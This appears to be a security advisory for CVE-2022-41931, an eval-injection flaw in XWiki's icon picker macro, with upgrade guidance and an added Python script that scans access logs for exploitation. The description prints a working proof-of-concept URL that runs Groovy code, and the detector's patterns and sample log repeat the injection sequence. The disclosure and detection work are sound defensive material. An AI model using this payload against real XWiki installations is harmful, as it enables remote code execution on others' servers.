PT-2022-26162 · Xwiki · Xwiki-Platform-Icon-Ui

Michael Hamann · Published 2022-11-21 · Updated 2022-11-30 · CVE-2022-41931

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions
xwiki-platform-icon-ui versions prior to 13.10.7
xwiki-platform-icon-ui versions prior to 14.4.2
xwiki-platform-icon-ui versions prior to 14.5

Description
The icon picker macro does not properly neutralize its macro parameters, which allows any user with view rights on commonly accessible documents to execute arbitrary Groovy, Python, or Velocity code in XWiki. This can be demonstrated using the URL "/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7BiconPicker%20id%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerId%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%20class%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerClass%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%2F%7D%7D": if the output "HellofromIconPickerId" or "HellofromIconPickerClass" is visible in the response, the XWiki installation is vulnerable.

Recommendations
For versions prior to 13.10.7, update to version 13.10.7 or later. For versions prior to 14.4.2, update to version 14.4.2 or later. For versions prior to 14.5, update to version 14.5 or later. As a temporary workaround, the patch can be applied manually by editing IconThemesCode.IconPickerMacro in the object editor, or by replacing the whole document with the fixed version imported from the XAR archive of a patched release.
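As an added detection example (not code from this advisory or from the XWiki project), the following Python script scans web server access log lines for requests that pass an iconPicker macro through the CKEditor HTML converter with a parameter that closes the html macro or opens a script macro, the breakout the description above relies on. The log layout and the sample log lines are assumptions constructed for the example.

```python
"""Flag access-log requests that abuse the XWiki icon picker macro
(CVE-2022-41931). Added example, not from the advisory or the XWiki project."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of the common/combined log format (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# An {{iconPicker}} call, and a value that closes the enclosing html macro or
# opens a script macro (the breakout the advisory describes).
ICON_PICKER = re.compile(r"\{\{iconPicker\b", re.I)
BREAKOUT = re.compile(r"\{\{/html\}\}|\{\{(?:groovy|python|velocity)\b", re.I)


def decode_fully(value: str, limit: int = 4) -> str:
    """Undo nested percent-encoding (the PoC double-encodes parts of the query)."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(target: str) -> bool:
    """True if the converter's 'text' parameter carries an icon picker macro
    with a breakout sequence or script macro inside its parameters."""
    query = parse_qs(urlsplit(target).query)
    for raw in query.get("text", []):
        text = decode_fully(raw)
        if ICON_PICKER.search(text) and BREAKOUT.search(text):
            return True
    return False


def scan_log(lines):
    """Return [(line_no, decoded_target)] for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((n, decode_fully(m.group("target"))))
    return hits


# Constructed sample log: a plain page view, a benign icon picker call, and a
# request shaped like the advisory's proof of concept.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Nov/2022:10:00:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Nov/2022:10:00:02 +0000] "GET /xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter'
    '&toHTML=true&text=%7B%7BiconPicker%20id%3D%22foo%22%2F%7D%7D HTTP/1.1" 200 812',
    '10.0.0.9 - - [21/Nov/2022:10:00:03 +0000] "GET /xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter'
    '&toHTML=true&text=%7B%7BiconPicker%20id%3D%22%27%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bgroovy%7D%7D'
    'println(1)%7B%7B%2Fgroovy%7D%7D%22%2F%7D%7D HTTP/1.1" 200 640',
]
```

Running scan_log(SAMPLE_LOG) reports only the third line; the benign icon picker call on the second line is not flagged because its parameters contain no macro-closing or script-macro sequence.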

Weakness Enumeration
Eval Injection

Related Identifiers
CVE-2022-41931
GHSA-5J7G-CF6R-G2H7

Affected Products
Xwiki-Platform-Icon-Ui